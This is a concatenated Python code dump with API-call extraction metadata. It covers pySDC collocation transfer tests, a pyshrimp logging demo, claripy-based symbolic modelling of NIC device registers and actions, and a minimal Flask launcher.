([], {'default_dialog_service': 'ErrorDialog'}), '(default_dialog_service=ErrorDialog)\n', (12260, 12296), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12664, 12729), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerDialog', 'tagger': 'JanomeTagger'}), '(default_dialog_service=TaggerDialog, tagger=JanomeTagger)\n', (12671, 12729), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13105, 13195), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerDialog, tagger=JanomeTagger,\n tagger_max_length=0)\n', (13112, 13195), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13449, 13553), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerManuallyParseDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerManuallyParseDialog, tagger=\n JanomeTagger, tagger_max_length=0)\n', (13456, 13553), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13973, 14086), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerManuallyParseGeneratorDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerManuallyParseGeneratorDialog, tagger=\n JanomeTagger, tagger_max_length=0)\n', (13980, 14086), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((14805, 14814), 'minette.Minette', 'Minette', ([], {}), '()\n', (14812, 14814), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((15224, 15233), 'minette.Minette', 'Minette', ([], {}), '()\n', (15231, 15233), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((587, 608), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (603, 608), False, 'from minette.utils import date_to_unixtime\n'), ((2724, 2739), 'pytz.timezone', 'timezone', (['"""UTC"""'], {}), "('UTC')\n", (2732, 2739), False, 'from pytz import timezone\n'), ((3277, 3299), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (3285, 3299), False, 'from pytz import timezone\n'), ((5166, 5188), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (5174, 5188), False, 'from pytz import timezone\n'), ((6136, 6158), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (6144, 6158), False, 'from pytz import timezone\n'), ((7316, 7387), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_user_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_user_test', channel_user_id=user_id)\n", (7323, 7387), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((7708, 7808), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_user_test"""', 'channel_detail': '"""detail"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_user_test', channel_detail='detail',\n channel_user_id=user_id)\n", (7715, 7808), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((8428, 8500), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""save_user_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='save_user_test', channel_user_id=user_id)\n", (8435, 8500), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((9029, 9050), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9045, 9050), False, 'from minette.utils import date_to_unixtime\n'), ((9290, 9311), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9306, 9311), False, 'from minette.utils import date_to_unixtime\n'), ((9555, 9576), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9571, 9576), False, 'from minette.utils import date_to_unixtime\n'), ((9676, 9750), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_user_id=user_id)\n", (9683, 9750), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10037, 10111), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_user_id=user_id)\n", (10044, 10111), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10149, 10177), 'minette.Group', 'Group', ([], {'id': "('group_' + user_id)"}), "(id='group_' + user_id)\n", (10154, 10177), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10549, 10652), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_detail': '"""detail"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_detail='detail',\n channel_user_id=user_id)\n", (10556, 10652), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11240, 11261), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (11256, 11261), False, 'from minette.utils import date_to_unixtime\n'), ((11389, 11464), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""save_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='save_context_test', channel_user_id=user_id)\n", (11396, 11464), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((9966, 9987), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9982, 9987), False, 'from minette.utils import date_to_unixtime\n'), ((10391, 10412), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (10407, 10412), False, 'from minette.utils import date_to_unixtime\n'), ((10883, 10904), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (10899, 10904), False, 'from minette.utils import date_to_unixtime\n'), ((11681, 11702), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (11697, 11702), False, 'from minette.utils import date_to_unixtime\n'), ((12452, 12474), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (12460, 12474), False, 'from pytz import timezone\n'), ((12586, 12615), 'datetime.datetime.now', 'datetime.now', ([], {'tz': 'bot.timezone'}), '(tz=bot.timezone)\n', (12598, 12615), False, 'from datetime import datetime\n'), ((1772, 1823), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (1779, 1823), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((2143, 2194), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (2150, 2194), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((2536, 2587), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (2543, 2587), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((3475, 3500), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (3490, 3500), False, 'import os\n')]
|
import nose
import numpy as np
from numpy.polynomial.polynomial import polyval
import pySDC.helpers.transfer_helper as th
from pySDC.core.Collocation import CollBase
from pySDC.tests.test_helpers import get_derived_from_in_package
classes = []
def setup():
global classes, t_start, t_end
# generate random boundaries for the time slice with 0.0 <= t_start < 0.2 and 0.8 <= t_end < 1.0
t_start = np.random.rand(1) * 0.2
t_end = 0.8 + np.random.rand(1) * 0.2
classes = get_derived_from_in_package(CollBase, 'pySDC/implementations/collocation_classes')
@nose.tools.with_setup(setup)
def test_Q_transfer():
for collclass in classes:
yield check_Q_transfer, collclass
def check_Q_transfer(collclass):
"""
A simple test program to check the order of the Q interpolation/restriction
"""
for M in range(3, 9):
Mfine = M
Mcoarse = int((Mfine+1)/2.0)
coll_fine = collclass(Mfine, 0, 1)
coll_coarse = collclass(Mcoarse, 0, 1)
assert coll_fine.left_is_node == coll_coarse.left_is_node, 'ERROR: should be using the same class for coarse and fine Q'
fine_grid = coll_fine.nodes
coarse_grid = coll_coarse.nodes
for order in range(2,coll_coarse.num_nodes+1):
Pcoll = th.interpolation_matrix_1d(fine_grid, coarse_grid, k=order, pad=0, equidist_nested=False)
Rcoll = th.restriction_matrix_1d(fine_grid, coarse_grid, k=order, pad=0)
for polyorder in range(1,order+2):
coeff = np.random.rand(polyorder)
ufine = polyval(fine_grid,coeff)
ucoarse = polyval(coarse_grid,coeff)
uinter = Pcoll.dot(ucoarse)
urestr = Rcoll.dot(ufine)
err_inter = np.linalg.norm(uinter-ufine, np.inf)
err_restr = np.linalg.norm(urestr-ucoarse, np.inf)
if polyorder <= order:
assert err_inter < 2E-15, "ERROR: Q-interpolation order is not reached, got %s" %err_inter
assert err_restr < 2E-15, "ERROR: Q-restriction order is not reached, got %s" % err_restr
else:
assert err_inter > 2E-15, "ERROR: Q-interpolation order is higher than expected, got %s" % polyorder
@nose.tools.with_setup(setup)
def test_Q_transfer_minimal():
for collclass in classes:
yield check_Q_transfer_minimal, collclass
def check_Q_transfer_minimal(collclass):
"""
A simple test program to check the order of the Q interpolation/restriction for only 2 coarse nodes
"""
Mcoarse = 2
coll_coarse = collclass(Mcoarse, 0, 1)
for M in range(3, 9):
Mfine = M
coll_fine = collclass(Mfine, 0, 1)
assert coll_fine.left_is_node == coll_coarse.left_is_node, 'ERROR: should be using the same class for coarse and fine Q'
fine_grid = coll_fine.nodes
coarse_grid = coll_coarse.nodes
Pcoll = th.interpolation_matrix_1d(fine_grid, coarse_grid, k=2, pad=0, equidist_nested=False)
Rcoll = th.restriction_matrix_1d(fine_grid, coarse_grid, k=2, pad=0)
for polyorder in range(1,3):
coeff = np.random.rand(polyorder)
ufine = polyval(fine_grid,coeff)
ucoarse = polyval(coarse_grid,coeff)
uinter = Pcoll.dot(ucoarse)
urestr = Rcoll.dot(ufine)
err_inter = np.linalg.norm(uinter-ufine, np.inf)
err_restr = np.linalg.norm(urestr-ucoarse, np.inf)
if polyorder <= 2:
assert err_inter < 2E-15, "ERROR: Q-interpolation order is not reached, got %s" %err_inter
assert err_restr < 2E-15, "ERROR: Q-restriction order is not reached, got %s" % err_restr
else:
assert err_inter > 2E-15, "ERROR: Q-interpolation order is higher than expected, got %s" % polyorder
|
[
"numpy.polynomial.polynomial.polyval",
"numpy.linalg.norm",
"pySDC.helpers.transfer_helper.restriction_matrix_1d",
"pySDC.tests.test_helpers.get_derived_from_in_package",
"numpy.random.rand",
"nose.tools.with_setup",
"pySDC.helpers.transfer_helper.interpolation_matrix_1d"
] |
[((576, 604), 'nose.tools.with_setup', 'nose.tools.with_setup', (['setup'], {}), '(setup)\n', (597, 604), False, 'import nose\n'), ((2290, 2318), 'nose.tools.with_setup', 'nose.tools.with_setup', (['setup'], {}), '(setup)\n', (2311, 2318), False, 'import nose\n'), ((491, 577), 'pySDC.tests.test_helpers.get_derived_from_in_package', 'get_derived_from_in_package', (['CollBase', '"""pySDC/implementations/collocation_classes"""'], {}), "(CollBase,\n 'pySDC/implementations/collocation_classes')\n", (518, 577), False, 'from pySDC.tests.test_helpers import get_derived_from_in_package\n'), ((411, 428), 'numpy.random.rand', 'np.random.rand', (['(1)'], {}), '(1)\n', (425, 428), True, 'import numpy as np\n'), ((2966, 3055), 'pySDC.helpers.transfer_helper.interpolation_matrix_1d', 'th.interpolation_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': '(2)', 'pad': '(0)', 'equidist_nested': '(False)'}), '(fine_grid, coarse_grid, k=2, pad=0,\n equidist_nested=False)\n', (2992, 3055), True, 'import pySDC.helpers.transfer_helper as th\n'), ((3068, 3128), 'pySDC.helpers.transfer_helper.restriction_matrix_1d', 'th.restriction_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': '(2)', 'pad': '(0)'}), '(fine_grid, coarse_grid, k=2, pad=0)\n', (3092, 3128), True, 'import pySDC.helpers.transfer_helper as th\n'), ((453, 470), 'numpy.random.rand', 'np.random.rand', (['(1)'], {}), '(1)\n', (467, 470), True, 'import numpy as np\n'), ((1288, 1381), 'pySDC.helpers.transfer_helper.interpolation_matrix_1d', 'th.interpolation_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': 'order', 'pad': '(0)', 'equidist_nested': '(False)'}), '(fine_grid, coarse_grid, k=order, pad=0,\n equidist_nested=False)\n', (1314, 1381), True, 'import pySDC.helpers.transfer_helper as th\n'), ((1398, 1462), 'pySDC.helpers.transfer_helper.restriction_matrix_1d', 'th.restriction_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': 'order', 'pad': '(0)'}), '(fine_grid, coarse_grid, k=order, pad=0)\n', (1422, 1462), True, 'import pySDC.helpers.transfer_helper as th\n'), ((3187, 3212), 'numpy.random.rand', 'np.random.rand', (['polyorder'], {}), '(polyorder)\n', (3201, 3212), True, 'import numpy as np\n'), ((3233, 3258), 'numpy.polynomial.polynomial.polyval', 'polyval', (['fine_grid', 'coeff'], {}), '(fine_grid, coeff)\n', (3240, 3258), False, 'from numpy.polynomial.polynomial import polyval\n'), ((3280, 3307), 'numpy.polynomial.polynomial.polyval', 'polyval', (['coarse_grid', 'coeff'], {}), '(coarse_grid, coeff)\n', (3287, 3307), False, 'from numpy.polynomial.polynomial import polyval\n'), ((3411, 3449), 'numpy.linalg.norm', 'np.linalg.norm', (['(uinter - ufine)', 'np.inf'], {}), '(uinter - ufine, np.inf)\n', (3425, 3449), True, 'import numpy as np\n'), ((3472, 3512), 'numpy.linalg.norm', 'np.linalg.norm', (['(urestr - ucoarse)', 'np.inf'], {}), '(urestr - ucoarse, np.inf)\n', (3486, 3512), True, 'import numpy as np\n'), ((1535, 1560), 'numpy.random.rand', 'np.random.rand', (['polyorder'], {}), '(polyorder)\n', (1549, 1560), True, 'import numpy as np\n'), ((1585, 1610), 'numpy.polynomial.polynomial.polyval', 'polyval', (['fine_grid', 'coeff'], {}), '(fine_grid, coeff)\n', (1592, 1610), False, 'from numpy.polynomial.polynomial import polyval\n'), ((1636, 1663), 'numpy.polynomial.polynomial.polyval', 'polyval', (['coarse_grid', 'coeff'], {}), '(coarse_grid, coeff)\n', (1643, 1663), False, 'from numpy.polynomial.polynomial import polyval\n'), ((1779, 1817), 'numpy.linalg.norm', 'np.linalg.norm', (['(uinter - ufine)', 'np.inf'], {}), '(uinter - ufine, np.inf)\n', (1793, 1817), True, 'import numpy as np\n'), ((1844, 1884), 'numpy.linalg.norm', 'np.linalg.norm', (['(urestr - ucoarse)', 'np.inf'], {}), '(urestr - ucoarse, np.inf)\n', (1858, 1884), True, 'import numpy as np\n')]
|
#!/usr/bin/env pyshrimp
# $opts: magic
from pyshrimp import log, shell_cmd
print('You can run this as any other script')
print('But then what is the point? :)')
log('You can use log with a bit more details!')
log('The log is initialized by run... but with magic it gets magically invoked!')
log('To do that just add magic to opts: # $opts: magic')
log('The downside is: script will run differently when invoked directly using %> python script.py')
log('Also if you forget to turn on magic those logs will not appear...')
shell_cmd('echo You can also run shell scripts easily', capture=False).exec()
|
[
"pyshrimp.log",
"pyshrimp.shell_cmd"
] |
[((164, 211), 'pyshrimp.log', 'log', (['"""You can use log with a bit more details!"""'], {}), "('You can use log with a bit more details!')\n", (167, 211), False, 'from pyshrimp import log, shell_cmd\n'), ((212, 298), 'pyshrimp.log', 'log', (['"""The log is initialized by run... but with magic it gets magically invoked!"""'], {}), "('The log is initialized by run... but with magic it gets magically invoked!'\n )\n", (215, 298), False, 'from pyshrimp import log, shell_cmd\n'), ((294, 350), 'pyshrimp.log', 'log', (['"""To do that just add magic to opts: # $opts: magic"""'], {}), "('To do that just add magic to opts: # $opts: magic')\n", (297, 350), False, 'from pyshrimp import log, shell_cmd\n'), ((351, 455), 'pyshrimp.log', 'log', (['"""The downside is: script will run differently when invoked directly using %> python script.py"""'], {}), "('The downside is: script will run differently when invoked directly using %> python script.py'\n )\n", (354, 455), False, 'from pyshrimp import log, shell_cmd\n'), ((451, 523), 'pyshrimp.log', 'log', (['"""Also if you forget to turn on magic those logs will not appear..."""'], {}), "('Also if you forget to turn on magic those logs will not appear...')\n", (454, 523), False, 'from pyshrimp import log, shell_cmd\n'), ((525, 595), 'pyshrimp.shell_cmd', 'shell_cmd', (['"""echo You can also run shell scripts easily"""'], {'capture': '(False)'}), "('echo You can also run shell scripts easily', capture=False)\n", (534, 595), False, 'from pyshrimp import log, shell_cmd\n')]
|
import claripy
from kalm import utils
from . import ast_util
from . import spec_act
from . import spec_reg
# TODO: Akvile had put a cache here, which is a good idea since the read-then-write pattern is common;
# I removed it cause it depended on state.globals, but we should put it back somehow
def __constrain_field(symb, start, end, value):
"""
Makes the constrain symb[end:start] = value on the state solver.
"""
if value & (2**(1 + end - start) - 1) != value:
raise Exception(f"The value {value} does not fit in the specified range {symb}[{end}:{start}].")
value = claripy.BVV(value, end - start + 1)
if start == 0:
if end == symb.size() - 1:
return value
return symb[symb.size()-1:end+1].concat(value)
if end == symb.size() - 1:
return value.concat(symb[start-1:0])
return symb[symb.size()-1:end+1].concat(value).concat(symb[start-1:0])
def __init_reg_val_symb(name, data):
"""
Creates and returns a Symbolic Bit Vector for the identified register based on
initial register field values
:param name: the name of the register
:param data: dictionary associated with the register reg
:return: the symbolic register value
"""
symb = claripy.BVS(name, data['length'])
last = 0 # Last unconstrained bit
for field, info in data['fields'].items():
if info['init'] == 'X': # Floating value can be modeled as uncontrained
last = info['end'] + 1
continue
if last != info['start']: # There is an implicit Reserved block
symb = __constrain_field(symb, last, info['start'] - 1, 0)
last = info['start']
symb = __constrain_field(symb, info['start'], info['end'], info['init'])
last = info['end'] + 1
if last != data['length']: # There is a reserved field at the end
symb = __constrain_field(symb, last, data['length'] - 1, 0)
return symb
def __init_reg_val_con(data):
"""
Creates and returns a Bit Vector for the indentified register based on
initial register field values. Returns None if the register cannot be
made concrete.
:param data: dictionary associated with the register
:return: BVV or None
"""
value = 0
for field, info in data['fields'].items():
if info['init'] == 'X': # Floating value can be modeled as uncontrained
return None
value = value | (info['init'] << info['start'])
bvv = claripy.BVV(value, data['length'])
return bvv
def get_pci_reg(base, spec):
for name, info in spec.items():
b, m, _ = info['addr'][0]
assert m == 0, "PCI m must be 0"
if b == base:
return name
raise Exception(f"PCI register with address 0x{base:x} is not in the spec.")
def find_reg_from_addr(state, addr, _cache={}):
if len(_cache) == 0:
for reg, data in spec_reg.registers.items():
idx = 0
for b, m, l in data['addr']:
for n in range(0, l+1-idx):
_cache[b + n*m] = (reg, n+idx)
idx += l + 1
"""
Finds which register the address refers to.
:return: the name of the register and its index.
"""
# Optimization: if addr isn't symbolic then deal with it quickly
if not isinstance(addr, claripy.ast.Base) or not addr.symbolic:
conc_addr = state.solver.eval(addr)
cached = _cache.get(conc_addr, None)
if cached is not None:
return cached
for reg, data in spec_reg.registers.items():
len_bytes = data['length'] // 8
idx = 0
for b, m, l in data['addr']:
high = b + (l-idx)*m + len_bytes
if b <= conc_addr and conc_addr < high:
reg_index = 0 if m == 0 else ((conc_addr - b) // m + idx)
if int(reg_index) == reg_index:
reg_index = int(reg_index) # they compare as equal but without this reg_index is still a float
#print(f"{reg}[{reg_index}]")
return reg, reg_index
idx += l + 1
raise Exception("Need to double-check logic below for symbolic indices...")
n = claripy.BVS("n", 64)
for reg, data in spec_reg.registers.items():
len_bytes = data['length'] // 8
p = 0
for b, m, l in data['addr']:
low = b + (n-p)*m
high = low + len_bytes
constraint = (n - p >= 0) & (n <= l) & (low <= addr) & (addr < high)
if utils.definitely_false(state.solver, constraint): # Continue the search
p += l + 1
continue
if m != 0:
n_con = state.solver.eval(n, extra_constraints=[constraint])
#if not (n_con in state.globals['indices']):
# state.globals['indices'] += [n_con]
#print(f"{reg}[{n_con}]")
return reg, n_con
#print(f"{reg}")
return reg, None
raise Exception(f"Cannot find register at {addr}.")
def is_reg_indexed(data):
_, m, _ = data['addr'][0]
return (m != 0)
def fetch_reg(reg_dict, reg, index, data, use_init):
"""
Fetches register from state global store. Initialises it if needed.
"""
if reg in reg_dict:
d = reg_dict[reg]
if is_reg_indexed(data):
if index in d.keys():
return d[index]
#else:
# raise "what do I do here?"
else:
return d
if use_init:
reg_bv = __init_reg_val_con(data)
if reg_bv is None:
# If a concrete value cannot be created, try symbolic
reg_bv = __init_reg_val_symb(reg, data)
else:
reg_bv = claripy.BVS(reg, data['length'])
update_reg(reg_dict, reg, index, data, reg_bv)
return reg_bv
def update_reg(reg_dict, reg, index, data, expr):
"""
Update register value in the state.
:param data: dictionary associated with the register reg
"""
if not is_reg_indexed(data):
reg_dict[reg] = expr
elif reg in reg_dict:
reg_dict[reg][index] = expr
else:
reg_dict[reg] = {index: expr}
def find_fields_on_write(state, prev, new, reg, spec):
"""
Finds which named fields of the register have been changed and
returns this information as a list.
"""
data = spec[reg]
fields = []
for field, info in data['fields'].items():
s = info['start']
e = info['end']
if not (prev[e:s] == new[e:s]).is_true(): #ideally, utils.can_be_false(state.solver, prev[e:s] == new[e:s]), but that's slow so let's be conservative
p = prev[e:s]
n = new[e:s]
fields += [(field, p, n)]
return fields
def check_access_write(old_val, new_val, reg, data, fields):
"""
Determines which fields are written and whether it is legal
to do so.
"""
reg_access = data['access']
if len(fields) == 0 and reg_access == spec_reg.Access.RO:
# NOTE: This permits writing to reserved fields
raise Exception(f"Illegal attempt to write to register {reg}")
for i, f_info in enumerate(fields):
(f, p, n) = f_info
field_access = data['fields'][f]['access']
if field_access == spec_reg.Access.IW:
fields[i] = (fields[i][0],fields[i][1],fields[i][1]) # new is prev
return
illegal = (field_access == spec_reg.Access.NA)
illegal |= (field_access == spec_reg.Access.RO)
if illegal:
raise Exception(f"Illegal attempt to write to {reg}.{f}")
def change_reg_field(state, device, name, index, registers, new):
"""
Changes a single field in a register and saves the new value.
:param name: register indentifier of the form REG.FIELD
:param register: register spec
:param new: new field value. If the field is to be made
symbolic, should be 'X'.
"""
reg, field = name.split('.', 1)
data = registers[reg]
prev = -1
dev_regs = device.regs
if registers == spec_reg.pci_regs:
dev_regs = device.pci_regs
reg_old = fetch_reg(dev_regs, reg, index, data, device.use_init[0])
reg_new = None
f_info = data['fields'][field]
if reg_old.op == 'BVV' and new != 'X':
val = 0
if f_info['start'] > 0:
before = state.solver.eval_one(reg_old[f_info['start']-1:0])
val = val | before
val = val | (new << f_info['start'])
if f_info['end'] < data['length'] - 1:
after = state.solver.eval_one(reg_old[data['length']-1:f_info['end']+1])
val = val | (after << f_info['end']+1)
reg_new = claripy.BVV(val, data['length'])
else:
if new == 'X':
raise "oops"
value_len = f_info['end'] - f_info['start'] + 1
if f_info['start'] == 0:
reg_new = claripy.BVV(new, value_len)
else:
reg_new = claripy.BVV(new, value_len).concat(reg_old[f_info['start']-1:0])
if f_info['end'] < data['length'] - 1:
reg_new = reg_old[data['length']-1:f_info['end']+1].concat(reg_new)
update_reg(dev_regs, reg, index, data, reg_new)
def verify_write(state, device, fields, reg, index, reg_dict, _cache={}):
"""
Verifies if the write can be matched to an action.
Raises an exception if it can't be matched.
"""
if len(_cache) == 0:
for action, info in spec_act.actions.items():
for r in info['action'].getRegisters():
if r in _cache:
_cache[r].append((action, info))
else:
_cache[r] = [(action, info)]
counter = device.counter[0]
for f_info in fields:
(f, prev, new) = f_info
# Actions which preconditions fail - useful for debuging
rejected = []
# The write to this field is invalid until a matching
# action is found
valid = False
if reg_dict[reg]['fields'][f]['access'] == spec_reg.Access.IW:
# Validating this field is optional
valid = True
for action, info in _cache.get(reg, []):
# Does the action match writing to this field?
action_matches = False
if reg_dict[reg]['fields'][f]['end'] != reg_dict[reg]['fields'][f]['start']:
action_matches = info['action'].isWriteFieldCorrect(state, f"{reg}.{f}", new)
elif info['action'].isFieldSetOrCleared(f"{reg}.{f}", ast_util.AST.Set) and utils.definitely_true(state.solver, new == claripy.BVV(-1, new.size())):
action_matches = True
elif info['action'].isFieldSetOrCleared(f"{reg}.{f}", ast_util.AST.Clear) and utils.definitely_true(state.solver, new == 0):
action_matches = True
if not action_matches:
continue
# If there is no precondition, the action is valid
precond_sat = True
if info['precond'] != None:
con = info['precond'].generateConstraints(device, spec_reg.registers, spec_reg.pci_regs, index)
precond_sat = utils.definitely_true(state.solver, con)
if not precond_sat:
rejected.append(action)
continue
valid = True
print("Action: ", action)
if action == 'Initiate Software Reset':
device.use_init[0] = True
device.latest_action[0] = action
if action in device.actions.keys():
# We have seen this action before
device.actions[action] = device.actions[action] + [counter]
else:
device.actions[action] = [counter]
if valid:
continue
if len(rejected) == 0:
raise Exception(f"Cannot validate writing to {reg}.{f}. There are no actions that match writing to this field.")
if not valid:
raise Exception(f"Cannot validate writing to {reg}.{f}. Matching but rejected actions: {rejected}. Maybe the precondition is not satisfied for one of them?")
# If we did not raise any exception, that means we are able to match
# concurrent writes to actions. Increment counter to establish
# action order.
device.counter[0] = counter + 1
|
[
"kalm.utils.definitely_true",
"claripy.BVV",
"kalm.utils.definitely_false",
"claripy.BVS"
] |
[((606, 641), 'claripy.BVV', 'claripy.BVV', (['value', '(end - start + 1)'], {}), '(value, end - start + 1)\n', (617, 641), False, 'import claripy\n'), ((1255, 1288), 'claripy.BVS', 'claripy.BVS', (['name', "data['length']"], {}), "(name, data['length'])\n", (1266, 1288), False, 'import claripy\n'), ((2487, 2521), 'claripy.BVV', 'claripy.BVV', (['value', "data['length']"], {}), "(value, data['length'])\n", (2498, 2521), False, 'import claripy\n'), ((4249, 4269), 'claripy.BVS', 'claripy.BVS', (['"""n"""', '(64)'], {}), "('n', 64)\n", (4260, 4269), False, 'import claripy\n'), ((5801, 5833), 'claripy.BVS', 'claripy.BVS', (['reg', "data['length']"], {}), "(reg, data['length'])\n", (5812, 5833), False, 'import claripy\n'), ((8741, 8773), 'claripy.BVV', 'claripy.BVV', (['val', "data['length']"], {}), "(val, data['length'])\n", (8752, 8773), False, 'import claripy\n'), ((4571, 4619), 'kalm.utils.definitely_false', 'utils.definitely_false', (['state.solver', 'constraint'], {}), '(state.solver, constraint)\n', (4593, 4619), False, 'from kalm import utils\n'), ((8943, 8970), 'claripy.BVV', 'claripy.BVV', (['new', 'value_len'], {}), '(new, value_len)\n', (8954, 8970), False, 'import claripy\n'), ((11217, 11257), 'kalm.utils.definitely_true', 'utils.definitely_true', (['state.solver', 'con'], {}), '(state.solver, con)\n', (11238, 11257), False, 'from kalm import utils\n'), ((9007, 9034), 'claripy.BVV', 'claripy.BVV', (['new', 'value_len'], {}), '(new, value_len)\n', (9018, 9034), False, 'import claripy\n'), ((10782, 10827), 'kalm.utils.definitely_true', 'utils.definitely_true', (['state.solver', '(new == 0)'], {}), '(state.solver, new == 0)\n', (10803, 10827), False, 'from kalm import utils\n')]
|
from app import app
HOST = "localhost"
PORT = 5000
if __name__ == '__main__':
app.run(HOST, PORT, debug=True)
|
[
"app.app.run"
] |
